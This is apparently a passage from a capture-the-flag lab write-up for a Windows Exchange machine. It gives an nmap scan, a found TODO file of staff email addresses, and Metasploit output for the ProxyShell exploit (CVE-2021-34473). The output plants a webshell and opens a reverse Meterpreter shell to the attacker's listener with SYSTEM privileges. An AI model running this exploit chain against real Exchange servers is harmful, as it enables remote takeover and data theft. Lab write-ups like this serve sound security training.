# Nmap 7.93 scan initiated Sun Apr 16 21:10:36 2023 as: nmap -sSVC -T4 -p- -v --open --reason -oA nmap lookback.thm Nmap scan report for lookback.thm (10.10.249.49) Host is up, received syn-ack ttl 127 (0.028s latency). Not shown: 65532 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 |_http-title: Site doesn't have a title. |_http-server-header: Microsoft-IIS/10.0 443/tcp open ssl/https syn-ack ttl 127 |_http-favicon: Unknown favicon MD5: 96AC7779590773AF5357B6E6CB710DDD | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Microsoft-IIS/10.0 | ssl-cert: Subject: commonName=WIN-12OUO7A66M7 | Subject Alternative Name: DNS:WIN-12OUO7A66M7, DNS:WIN-12OUO7A66M7.thm.local | Issuer: commonName=WIN-12OUO7A66M7 | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2023-01-25T21:34:02 | Not valid after: 2028-01-25T21:34:02 | MD5: 84e0805f3667c38fd8204e7c1da04215 |_SHA-1: 08458fd9d9bfc4c648db1f82d3e7324ea92452d7 | http-title: Outlook |_Requested resource was https://lookback.thm/owa/auth/logon.aspx?url=https%3a%2f%2flookback.thm%2fowa%2f&reason=0 3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services | rdp-ntlm-info: | Target_Name: THM | NetBIOS_Domain_Name: THM | NetBIOS_Computer_Name: WIN-12OUO7A66M7 | DNS_Domain_Name: thm.local | DNS_Computer_Name: WIN-12OUO7A66M7.thm.local | DNS_Tree_Name: thm.local | Product_Version: 10.0.17763 |_ System_Time: 2023-04-16T19:12:41+00:00 | ssl-cert: Subject: commonName=WIN-12OUO7A66M7.thm.local | Issuer: commonName=WIN-12OUO7A66M7.thm.local | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2023-01-25T21:12:51 | Not valid after: 2023-07-27T21:12:51 | MD5: dce9a0190d34ca2401bdb21574409c9d |_SHA-1: d55a03f1992df334805947f990eb25be4092cbf0 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 16 21:12:46 2023 -- 1 IP address (1 host up) scanned in 130.51 seconds
PS C:\users\dev\Desktop> cat TODO.txt Hey dev team,
This is the tasks list for the deadline:
Promote Server to Domain Controller [DONE] Setup Microsoft Exchange [DONE] Setup IIS [DONE] Remove the log analyzer[TO BE DONE] Add all the users from the infra department [TO BE DONE] Install the Security Update for MS Exchange [TO BE DONE] Setup LAPS [TO BE DONE]
When you are done with the tasks please send an email to:
joe@thm.local carol@thm.local and do not forget to put in CC the infra team! dev-infrastracture-team@thm.local
Elevation of Privilege (EoP) - Exchange exploitation#
Name Current Setting Required Description ---- --------------- -------- ----------- EMAIL dev-infrastracture-team@thm.local no A known email address for this organization Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.10.249.49 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) UseAlternatePath false yes Use the IIS root dir as alternate path VHOST win-12ouo7a66m7.thm.local no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on.
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.9.65.100 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name -- ---- 0 Windows Powershell
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/exchange_proxyshell_rce) > run
[*] Started reverse TCP handler on 10.9.65.100:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [*] Attempt to exploit for CVE-2021-34473 [*] Retrieving backend FQDN over RPC request [*] Internal server name: win-12ouo7a66m7.thm.local [*] Assigning the 'Mailbox Import Export' role via dev-infrastracture-team@thm.local [+] Successfully assigned the 'Mailbox Import Export' role [+] Proceeding with SID: S-1-5-21-2402911436-1669601961-3356949615-1144 (dev-infrastracture-team@thm.local) [*] Saving a draft email with subject 'qJsINJcx' containing the attachment with the embedded webshell [*] Writing to: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\5YGhwaT2.aspx [*] Waiting for the export request to complete... [+] The mailbox export request has completed [*] Triggering the payload [*] Sending stage (200774 bytes) to 10.10.249.49 [+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\5YGhwaT2.aspx [*] Meterpreter session 1 opened (10.9.65.100:4444 -> 10.10.249.49:17646) at 2023-04-16 23:37:42 +0200 [*] Removing the mailbox export request [*] Removing the draft email
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM